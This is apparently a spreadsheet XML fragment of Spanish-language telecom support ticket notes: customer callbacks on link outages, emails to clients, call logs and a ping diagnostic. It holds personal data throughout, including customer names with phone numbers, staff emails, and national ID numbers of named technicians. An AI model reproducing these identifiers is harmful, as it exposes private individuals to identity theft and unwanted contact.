    <t>SE CONTACTA NUEVAMENTE CON EL CL LUIS FERNANDO AL 41752352  ID 1001876407 / 1001876880 PARA EL SEGUIMIENTO DE LA CONFIRMACIÓN DE LA VENTANA DE CAMBIO  EL DÍA DE HOY 24/05/2022 EN EL HORARIO DE LAS 23:30 HORAS, DONDE CONFIRMA QUE LE RECHAZARON EL CAMBIO PORQUE AL PARECER SE REDACTO MAL EL INFORME POR LO QUE PROCEDERÁ NUEVAMENTE A GESTIONARLO Y MIENTRAS LO VALIDA AUTORIZA EL CIERRE DE LA FALLA Y CIERRE DE TICKET, SE NOTIFICA AL GESTOR SAUL.VALENZUELA PARA EL CAMBIO VÍA SKYPE</t>
  </si>
  <si>
    <t>F4565887</t>
  </si>
  <si>
    <t>F4565895</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 40682396 RESPONDE EDDY MENCIONA QUE APLICARON REINICIO A LOS EQUIPOS  Y CUALQUIER CONSULTA A LA ORDEN
-ID 2001836078</t>
  </si>
  <si>
    <t>SE LE LLAMA A CLIENTE ENCARGADO DE SITIO 40682396 || 23314198 ID: 2001842948
ATIENDE EDY, COMENTA QUE ES POSIBLEMENTE QUE FUE UN APAGON EL QUE OCASIONO CAIDA, SERVICIO LE FUNCIONA CORRECTAMENTE, AUTORIZA CIERRE DE INCIDENTE | SE NOTIFICA A JOSE.OCHOA VIA SKYPE | SE TERMINARA DE VALIDAR CON CENTRAL CON SD | WIP</t>
  </si>
  <si>
    <t>F4565897</t>
  </si>
  <si>
    <t>SE ENVIA CORREO CON SOLICITUD DE ACCESOS</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 22857708 PARA INFORMAR LO DETERMINADO POR GESTIÓN N1 Y ASÍ CONTINUAR SEGUIMIENTO DEL TICKET, NO CONTESTA.</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 22857708 PARA SEGUIMIENTO, NO CONTESTA; FUERA DE HORARIO LABORAL; LLAMAR MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>F4565910</t>
  </si>
  <si>
    <t>SE LLAMO A MONITOREO 5B INDICA MOISES QUE SE CAJERO SE ENCUENTRA DENTRO DE UNA AGENCIA BANRURAL POR LO QUE SOLICITA SE LES LLAME A MONITOREO 5B A PARTIR DE LAS 8:00 AM PARA QUE ELLOS GESTIONEN LA REVISIÓN DE LOS EQUIPOS EN EL CAJERO CON APOYO DE AGENCIA.
3001324794
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:06:12
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA:INTERFUNCIONAMIENTO SIN ESPECIFICAR (CÓDIGO 127 CAUSA ISDN)]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 18/05/2022 18:48:29
RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 18:48
FIN: HOY, 18:51
DURACIÓN: 3:16
ID DE LLAMADA: 3001337023</t>
  </si>
  <si>
    <t>F4565916</t>
  </si>
  <si>
    <t>CLIENTE ALEJANDRO LOPEZ 41782659 REALIZA PRUEBAS Y VALIDA EL E1 ACTIVO, AUTORIZA EL CIERRE DEL CASO. ID2001822742</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE ALEJANDRO LOPEZ 41782659, SE LE SOLICITA SU APOYO PARA REINICIAR SU PLANTA PBX</t>
  </si>
  <si>
    <t>F4565935</t>
  </si>
  <si>
    <t xml:space="preserve">
SE CONSULTA A PERSONAL DE BANCO AZTECA SOBRE EL ESTADO DE LA AGENCIA</t>
  </si>
  <si>
    <t>F4565942</t>
  </si>
  <si>
    <t>SE ESTÁ CONSULTANDO AVANCES DEL TICKET A GESTIÓN N1 VÍA SKYPE, EN ESPERA DE APOYO DE ÉSTOS, TICKET NO CORRESPONDE A CLIENTE.</t>
  </si>
  <si>
    <t>F4565947</t>
  </si>
  <si>
    <t>SE CONTACTA ESTUARDO SAQUIX  DEL 59519771 ID 2001876099 PARA EL SEGUIMIENTO DEL TICKET SD1126244 QUE ESTA EN EL MISMO SECTOR DE SU OTRO TICKET SD1126221 Y VALIDA QUE LA INFORMACIÓN QUE SE LE BRINDO EN EL CIERRE DEL TICKET SD1126221  ES LO MISMO EN EL TICKET ACTUAL, POR LO QUE CANCELA EL MONITOREO QUE TENIA PARA EL SEGUIMIENTO  Y CONFIRMA EL CIERRE DE TICKET.  SE NOTIFICA EL GESTOR YENSI.CALGUA VIA SKYPE PARA EL CAMBIO DE ESTADO Y SE CAMBIA DE ESTADO.</t>
  </si>
  <si>
    <t>F4565949</t>
  </si>
  <si>
    <t xml:space="preserve">
JUAN PABLO MORALES BARRONDO
VIE 20/05/2022 9:54 A.M.
ELEMENTOS ENVIADOS; BANDEJA DE ENTRADA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PODRÍAN CONFIRMARNOS SI SE TIENE ALGÚN INCONVENIENTE CON LA ENERGÍA O BIEN BRINDARNOS LOS CONTACTOS DEL PUNTO REMOTO PARA REALIZAR PRUEBAS.
TICKET: F4565949
ID: ID1184012SV
IDENTIFICADOR DEL ENLACE CC_GMG_SV_TIENDA25
UBICADO EN: LA PALMA/CHALATENANGO   BO. EL CENTRO           CALLE PRINCIPAL         S/N                     CTGO. BANCO AZTECA¿
QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.</t>
  </si>
  <si>
    <t>F4565950</t>
  </si>
  <si>
    <t xml:space="preserve">
ENLACE CAIDO, SE CONSULTA A PERSONAL DE MONITOREO DE BANCO AZTECA SOBRE EL ESTADO DE LA AGENCIA
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN ELEKTRADATOS 10.18.19.180
  PING 10.18.19.180: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.18.19.180 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.79
DISPLAY IP ROUTING-TABLE VPN-INSTANCE ELEKTRADATOS 10.18.19.180
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : ELEKTRADATOS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.18.19.180/32  DIRECT  0    0                 0.0.0.0         VLANIF339			</t>
  </si>
  <si>
    <t>F4565957</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE, A LA ESPERA DE LA RESPUESTA.
DE: CARLOS IVAN PALENCIA FLORES
ENVIADO: MIÉRCOLES, 18 DE MAYO DE 2022 17:35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548
ESTIMADO CLIENTE,
SOLICITAMOS SU APOYO PARA ENVIAR SUPERVISOR PARA QUE VALIDE LOS EQUIPOS DEL ENLACE PRINCIPAL YA QUE EN NUESTRO MONITOREO SE OBSERVA QUE NO SE TIENE CONECTADO EL EQUIPO AL ROUTER TELDAT O BIEN QUE EL EQUIPO DE FIBRA CTC ESTE APAGADO.
SE INGRESA AL CAJERO POR EL ENLACE 3G Y SE OBSERVA INTERFAZ DOWN
TICKET: F4565957
ID: 47503613T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM4548
UBICADO EN: CAJERO 4548_KM 19 CARRETERA  A EL SALVADOR INTERIOR GASOLINERA PUMA FRAIJANES_SUPER 24 MONTECARLO
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4565958</t>
  </si>
  <si>
    <t>**SE LLAMA A EJECUTIVO NEFTALI  AL 503 7740 0068  NO RESPONDE,  ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001112480
**</t>
  </si>
  <si>
    <t>**SE LLAMA A EJECUTIVO NEFTALI  AL 503 7740 0068  NO RESPONDE,  ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001068710
**</t>
  </si>
  <si>
    <t>**SE LLAMA A EJECUTIVO NEFTALI  AL 503 7740 0068  SIGUE SIN RESPONDE ,  ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001149604
**</t>
  </si>
  <si>
    <t>**SE LLAMA A EJECUTIVO NEFTALI  AL 503 7740 0068  NO RESPONDE,  ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001094734
**</t>
  </si>
  <si>
    <t>**SE LLAMA A EJECUTIVO NEFTALI  AL 503 7740 0068  SIGUE SIN RESPONDE ,  ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001167823
**</t>
  </si>
  <si>
    <t>**SE LLAMA A EJECUTIVO NEFTALI  AL 503 7740 0068  SIGUE SIN RESPONDE ,  ENVIA A BUZON SE INTENTARA LUEGO **
ID 3001189824
**</t>
  </si>
  <si>
    <t>F4565962</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ZUCELI HERNANDEZ 30829715 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001859747 - 2001860359</t>
  </si>
  <si>
    <t>F4565963</t>
  </si>
  <si>
    <t>SE LLMA A CLIENTE CARRILLO BENJAMIN 78624366 MENCIONA QUE NO ES QUE TENGAN CAIDA TOTAL, CLIENTE REPORTA NO LLEGAR AL ANCHO DE BANDA CONTRATADO  15MBPS, CLIENTE SOLICITA LLAMADA PARA LAS 14:00 HRS  REALIZAR PRUEBAS
SE NOTIFICARA A GESTOR
-ID 2001849724</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARRILLO BENJAMIN AL 78624366 INDICA QUE SI SE PUEDEN REALIZAR PRUEBAS EN CONJUNTO || SE NOTIFICA A GESTOR YA QUE SE TRATA DE LOCALIZAR Y NO SE OBTIENE RESPUESTA**
 ID 2001956664
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARRILLO BENJAMIN AL 78624366 INDICA QUE EL PROBLEMA ES QUE NO SE LE ESTA DANDO EL ANCHO DE BANDA CONTRATADA  || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 3001078515
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARRILLO BENJAMIN AL 78624366 SOLICITA QUE SE LE LLAME EN 15 MIN NUEVAMENTE **
ID 3001069712
**</t>
  </si>
  <si>
    <t>F4565964</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE DIANA 35763748 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001847325</t>
  </si>
  <si>
    <t>F4565972</t>
  </si>
  <si>
    <t>SE CONVERSA CON SERGIO AYALA DE CNOC HONDURAS, INDICA QUE YA SE TIENEN TECNICOS EN SITIO,  INGENIERIA CLIENTES ESTARA EN LA MEET,  ENVIA LINK DE TEAMS.
HTTPS://TEAMS.MICROSOFT.COM/_#/PRE-JOIN-CALLING/19:MEETING_ZTCWMTNHNJMTMJA2ZI00ODEZLWJKNDCTNDMXNDE0MGY2ODVI@THREAD.V2
NÚMERO: 0050432914254
FIN: HOY, 09:49
ID DE LLAMADA: 2001855293</t>
  </si>
  <si>
    <t>SE CONVERSA CON CLIENTE, MANUEL FLORES, QUIEN MENCIONA QUE LE HAN INDICADO QUE ESTARAN VISITANTO LOS TECNICOS AL SITIO PARA VALIDARA LAS PRUEBAS INFORMACION PROPORCIOANADA POR SALMA PACHECO,  SE CONTACTARA A EJECUTIVO DE CUENTA PARA OBTETENER MAS DETALLES
2001849158
COLA:
NOMBRE: A: 0050494877702
NÚMERO: 0050494877702
DURACIÓN: 0:09:05
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 0050494877702
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 17/05/2022 09:36:50</t>
  </si>
  <si>
    <t>F4565976</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GERARDO GONZALES 41385114 MENCIONA QUE TENIA INFORMACION DE UN TRASLADO CON ESTE SERVICIO, SE LE CONSULTA SI SE ESTA DANDO EL SEGUIMIENTO CON EL EJECUTIVO Y MENCIONA QUE NO TIENE CONOCIMIENTO
CLIENTE SOLICITA LLAMADA EN 30 MIN
-ID 2001856994</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  GERARDO GONZALES 41385114  RESPONDE JULIO MENCIONA QUE SE ESTA REALIZANDO UN TRASLADO CON EL SERVICIO, CLIENTE CONFIRMA QUE LE ESTANDANDO SEGUIMIENTO CON SU EJECUTIVO
-ID 2001886841</t>
  </si>
  <si>
    <t>F4565977</t>
  </si>
  <si>
    <t>F4565978</t>
  </si>
  <si>
    <t>CLIENTE RAFAEL CASTELLANOS 70692332 TRASLADA LA LLAMADA CON VLADIMIR SANTOS QUIEN COMENTA QUE EL DÍA DE AYER TUVO INCONVENIENTE CON INTEREFERENCIA EN SUS LLAMADAS SALIENTES. SE LE COMENTA AL CLIENTE QUE SE TUVO UNA FALLA GENERAL CON ESTA AFECTACIÓN PERO EL MISMO YA FUE SOLUCIONADO. CLIENTE REALIZA PRUEBAS Y VALIDA QUE YA NO TIENE EL PROBLEMA. AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 2001848235</t>
  </si>
  <si>
    <t>F4565980</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE ROSA MARINA DURAN 77879451 PARA VALIDAR EL ESTADO DEL SERVICIO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE ROSA MARINA DURAN 7787-9451 PARA VALIDAR EL PROBLEMA, SIN EMBARGO SIGUE SIN CONTESTAR
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>CLIENTE NO NOS CONTESTA PARA CONSULTAR CUAL ES EL INCONVENIENTE QUE PRESENTA, SE INTENTARA NUEVAMENTE EN UNOS MINUTOS
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ROSA MARINA DURAN 77879451 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001862206</t>
  </si>
  <si>
    <t>F4565985</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  CARLOS GODINEZ 40713166 MENCIONA QUE SE COORDINE LA VISITA PARA EL JUEVES A LAS 14 HRS
CLIENTE SOLICITA LLAMADA EL JUVES A LAS 13:00 HRS PARA CONFIRMAR LA VISITA
-ID 1001728935</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS GODÍNEZ 40713166 MENCIONA QUE AUN NO CUENTA CON LAS LLAVES PARA INGRESAR A LOS EQUIPOS POR LO QUE SOLICITA LLAMADA EL DIA LUNES A LAS 14:00 HRS PARA CONFIRMAR EL HORARIO  DE VISITA
-ID 1001089658</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON CARLOS GODÍNEZ/CLIENTE 40713166 INDICA QUE POR EL MOMENTO NO TIENE FECHA DEFINIDA PARA ACCEDER A LOS EQUIPOS, PIDE SE LE LLAME MAÑANA VIERNES A LAS 08:00AM PARA SEGUIMIENTO.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS GODINEZ 40713166 MENCIONA QUE AUN NO TIENEN ACCESO A LOS EQUIPOS POR LO QUE ESTARAN TRATANDO DE REALIZAR PRUEBAS DURANTE ESTOS
CLIENTE SOLICITA LLAMADA PARA EL DIA VIERNES A LAS 8:00 HRS PARA VALIDAR LA HORA Y FECHA DE VISITA O CONFIRMAR EL FUNCIONAMIENTO
-ID 3001023522</t>
  </si>
  <si>
    <t>F4565987</t>
  </si>
  <si>
    <t>SE NOTIFICA A CLIENTE SOBRE REINICIOS EN CPE, SE QUEDA AL PENDIENTE DE ESTADO DE REVISION  Y CONTACTOS PARA REALIZAR PRUEBAS DE CONEXIONES CON EL EQUIPO CISCO *******REINCIDENTE***********
KENNY ROBERT RIVERA JUAREZ
ESTIMADO CLIENTE,
EN SEGUIMIENTO AL ENLACE ALARMADO EN NUESTRO MONITOREO PARA LA AGENCIA CC_BANCO_AGRICOLA_SV_CC_ILC_SAN_RAFAEL_CEDROS, SOLICITAMOS SU APOYO EN VALIDAR SI LOS EQUIPOS ACTUALMENTE SE ENCUENTRAN CONECTADOS Y PROTEGIDOS A UN UPS, Y SI ESTE SE ENCUENTRA EN BUEN ESTADO, YA QUE OBSERVAMOS REINICIOS CONSTANTES POR ENERGÍA EN EL EQUIPO CISCO C1111-4P, ASÍ TAMBIÉN SI FUESE POSIBLE BRINDARNOS ALGÚN NÚMERO DE CONTACTO EN EL PUNTO REMOTO PARA REALIZAR PRUEBAS DE CONEXIONES CON EL EQUIPO YA INDICADO. QUEDO ATENTO A SUS COMENTARIOS.
TICKET: F4565987
ID: IP2098014SV
IDENTIFICADOR DEL CLIENTE: CC_BANCO_AGRICOLA_SV_CC_ILC_SAN_RAFAEL_CEDROS
UBICADO EN: ILC SAN RAFAEL CEDROS                             CARRETERA A ILOBASCO   KM 41 1/2              CANTON EL ESPINAL
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4565992</t>
  </si>
  <si>
    <t>77765629, 77771032, 37560715. ID: 2001887369 / 2001887390 / 2001887263 / 2001887431, NO RESPONDEN
SE UBICA CONTACTO EN OTRO TICKET 30640139  MANUEL, SE LE LLAMA Y COMENTA QUE NO HABIA ENERGIA EN SITIO PERO YA TODO ESTA BIEN, SERVICIO DE INTERNET OK, AUTORIZA CIERRE DE INCIDENTE, SE NOTIFICA A FRANCISCO.QUEZADA VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES NO RESPONDE, SE INTENTARA LUEGO
-ID 2001844261</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 77765629 - 77771032 - 37560715 NO RESPONDEN, SE INTENTARA LUEGO
-ID 2001841657 - 2001841740 - 2001842286</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE WALTER REYES 45787911 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001864408</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 37560715 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001863141</t>
  </si>
  <si>
    <t>F4565993</t>
  </si>
  <si>
    <t>DESPACHO SV				
	WO OPEN                                			10:20
1/5	RICARDO DE PAZ	78432633	2 HORAS	12:20:00
2/5	HUMBERTO CHIQUILLO	78523419	3 HORAS	13:20:00
3/5	HUMBERTO CHIQUILLO	78523419	4 HORAS	14:20:00
4/5	OSCAR HERNANDEZ	7855-0164	5 HORAS	15:20:00
5/5	JUAN RIVAS 	7606-7202	7 HORAS	17:20:00</t>
  </si>
  <si>
    <t>SE LLAMA A CONTACTO EN PR 504 3328-0429  SIN EMBARGO NO RESPONDE--</t>
  </si>
  <si>
    <t>F4566001</t>
  </si>
  <si>
    <t>SE TIENE A CLIENTE EN LINEA- DOUGLAS CABRERA-25233011 - 76545283 --- COEMTNA QUE LE REPORTARON ENTRECORTE- SE LE INDICA QUE SE TUVO PROBLEMAS EL DIA DE AYER Y HOY YA NO- CLIENTE COMENTA QUE REALIZARA PRUEBAS Y PIDE LLAMADA A LAS 10 AM ##</t>
  </si>
  <si>
    <t>SE HA LLAMADO A CLIENTE DOUGLAS CABRERA-25233011 - 76545283 ---  CONTESTA SEÑORITA LISSET DE LA ROSA- COEMNTA QUE EL SERÑOR DOUGLAS NO ESTA Y NO SABE NADA DE REPOERTE ## PIDE SE LE MARQUE EN 30 MINUTOS ##VIVO</t>
  </si>
  <si>
    <t>F4566006</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PINEDA 54304193 SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001868539</t>
  </si>
  <si>
    <t>F4566010</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS TOC 59183858  QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001852974</t>
  </si>
  <si>
    <t>F4566019</t>
  </si>
  <si>
    <t>SE LLAMÓ/HABLÓ CON EDGAR HERNÁNDEZ/CLIENTE 00 525551745299 INDICA ENLACE OK, AUTORIZA CIERRE DEL TICKET.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, SE QUEDA A ESPERA DE RESPUESTA
DE: LUVY ESAU SANDOVAL MATEO &lt;LUVY.SANDOVAL@CLARO.COM.GT&gt;
ENVIADO: MARTES, 17 DE MAYO DE 2022 13:05
PARA: GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; HERNANDEZ ESCALONA JUAN JOSE &lt;JHESCALO@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 20558399PA &amp; 20559628PA ### ::: TICKET CNOC IMBBL003924 &amp; IMBBL003925### ::: LINK DOWN
BUEN DÍA, ESTIMADO CLIENTE.
COMO PARTE DEL SEGUIMIENTO AL CASO CON SD1126281, SE OBSERVA DE NUESTRA PARTE ENLACE CAÍDO,  UBICADO EN  -  - CHANGUINOLA,  AVE. OMAR TORRIJOS, FÁBRICA BIMBO, PLANTA BIMBO- CHANGUINOLA - BOCAS DEL TORO SOLICITAMOS DE  SU AMABLE APOYO EN BRINDAR ALGÚN CONTACTO DE PUNTO REMOTO PARA VALIDAR TEMAS DE PRIMER NIVEL.
SALUDOS CORDIALES</t>
  </si>
  <si>
    <t>F4566020</t>
  </si>
  <si>
    <t>SE LE LLAMA A OSCAR CALEL 56996333 ID: 2001858587
CLIENTE CONFIRMA QUE EL SERVICIO ESTA OK, AUTORIZA CIERRE DE INCIDENTE
SE NOTIFICA A JHONNSER.ESCOBAR VIA SKYPE |  SE TERMINARA DE VALIDAR MEDIANTE SD CON CENTRAL | WIP</t>
  </si>
  <si>
    <t>F4566021</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
PROBLEMAS CON SEÑAL.
GUARDADO: MAR 17/05/2022 11:11
BUENOS DÍAS ESTIMADOS.
BRINDANDO SEGUIMIENTO AL INCIDENTE REPORTADO, ADJUNTO LOS DATOS DEL PERSONAL QUE SE HARÁ PRESENTE A SUS INSTALACIONES, FAVOR DE INDICAR EN EL HORARIO QUE SE PODRÁ PRESENTAR PERSONAL TÉCNICO.
ADJUNTO LOS DATOS:
NOMBRE
DPI
IVAN ARRAZOLA
2319 45019 0101
DENNIS HERNÁNDEZ
1894 89464 0101
EDY ESCALANTE
1981 17108 0101
JOSÉ ÁNGEL SANDOVAL
1796 76350 0101
RENE COJON
2275 16001 0101
HECTOR ALINAN
2360 72870 0208
BYRON CUTZAL
1689 67987 0101
WILSON LOPEZ
2592 44201 0101
ATENTAMENTE:</t>
  </si>
  <si>
    <t>F4566030</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: MARTES, 17 DE MAYO DE 2022 17:31
PARA: JOSE MANUEL OCHOA URBINA &lt;JOSEM.OCHOA@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; JEFFERSON ARCE (VENDOR) &lt;JEFFERSON.ARCE@WALMART.COM&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;
ASUNTO: RE: ENLACE INESTABLE DE DF CATACAMAS ID: 888290OH
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4566032</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE PABLO CRUZ 79254065 INDICA QUE ESTA REALIZANDO PRUEBAS, SOLICITA LLAMADA EN DOS HORAS
LLAMADA REALIZADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4566038</t>
  </si>
  <si>
    <t>SE LLAMAA CLIENTE AMERICA PEREZ-58726497  INDICA QUE REPORTA INTERNET Y NO TELEFONA------------ EN TELEFONIA TODO OK ##</t>
  </si>
  <si>
    <t>F4566039</t>
  </si>
  <si>
    <t>SE LE LLAME A FLORENCIO 53218057 ID: 2001876941 /
CL CONFIRMA SERVICIO OK, AUTORIZA CIERRE DE TKT | SE NOTIFICA A MIGUELAN.RODRIGUEZ VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>F4566041</t>
  </si>
  <si>
    <t>SE LE LLAMA A FELIPE PELAEZ 54629350  ID: 2001878565 /
SE LE INFORMA SOBRE SATURACION INTERNA, AUTORIZA CIERRE DE TKT, SE NOTIFICA A YENSI.CALGUA VIA SKYPE | WIP</t>
  </si>
  <si>
    <t>F4566044</t>
  </si>
  <si>
    <t>SE TERMINA LLAMADA AL AREA DE MONITORE DE CAJEROS, RESPONDE HECTOR QUIEN ME INDICA QUE EL CAJERO ESTA FUERA POR ENERGIA YA QUE DE PARTE DE EGSA SE TIENE MANTENIMIENTO Y NO SE TIENE TIEMPO ESTIMADO.
3001014689
COLA:
NOMBRE: A: 24207212
NÚMERO: 24207212
DURACIÓN: 0:07:57
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24207212
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: CARLOSI.PALENCIA
FECHA Y HORA LOCALES: 17/05/2022 17:08:48</t>
  </si>
  <si>
    <t>F4566051</t>
  </si>
  <si>
    <t>CLIENTE GLORIA DE GUEVARA APOYA UBICANDO Y REINICIANDO EQUIPO ASMI54L, LUEGO DEL REINICIO CONTINUA EN EL MISMO ESTADO DE ALARMA, SE PROCEDE A ABRIR WO</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GLORIA DE GUEVARA 78606978 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001913941</t>
  </si>
  <si>
    <t>F4566054</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALVARO MONASTERIO 58023208 PERO ENVIA DIRECTAMENTE A BUZON, SE INTENTARA LUEGO
-ID 2001885473</t>
  </si>
  <si>
    <t>*** SE TRATÓ DE CONTACTAR CON CLIENTE ÁLVARO MONASTERIO 58023208, SIN EMBARGO,  NO SE LOGRA YA QUE ENVÍA DIRECTO A BUZÓN (ID 3001040182) ***</t>
  </si>
  <si>
    <t>*** SE TRATÓ DE CONTACTAR CON CLIENTE ÁLVARO MONASTERIO 58023208, SIN EMBARGO, TRAS VARIOS INTENTOS NO SE LOGRA LA COMUNICACIÓN. SE DEBE DE REALIZAR MEDICIONES EN LA FIBRA DE CLIENTE HACIA NODO. ***
(ID 3001016677 / 3001016883)</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALVARO MONASTERIO 58023208 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001022771</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALVARO MONASTERIO 58023208 PERO NO HAY RESPUESTA A LLAMADAS
3001005276
COLA:
NOMBRE: A: 55280199
NÚMERO: 55280199
DURACIÓN: 0:00:10
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 17/05/2022 16:29:41
3001005195
COLA:
NOMBRE: A: 58023208
NÚMERO: 55280199
DURACIÓN: 0:00:13
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 55280199
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ERITO.TECU
FECHA Y HORA LOCALES: 17/05/2022 16:29:45</t>
  </si>
  <si>
    <t>F4566058</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE DOUGLAS CABRERA 76545283
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE DOUGLAS CABRERA 76545283 COMENTA QUE AUN ESTA PRESENTANDO EL PROBLEMA DE CRUCE DE AUDIOS Y LLAMADAS CORTADAS, SE LE INDICA QUE EL SERVICIO ESTA AFECTADO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>NOS ATIENDE ANA PALACIOS QUIEN INDICA QUE NO PRESENTA NINGUN INCONVENIENTE CON LA INTERFERENCIA
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4566066</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE REGINA CACERES 45740430 QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 2001876932</t>
  </si>
  <si>
    <t>F4566074</t>
  </si>
  <si>
    <t>SE LE LLAMA A PR 77227283 ID: 2001882729
ATIENDE: YULEN DE LEON, CL COMENTA QUE NO HAY ENERGIA EN EL SITIO, SE LE NOTIFICA A LUVY.SANDOVAL VIA SKYPE PARA EL CIERRE | WIP</t>
  </si>
  <si>
    <t>F4566077</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JORGE MOLINA 42418536 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
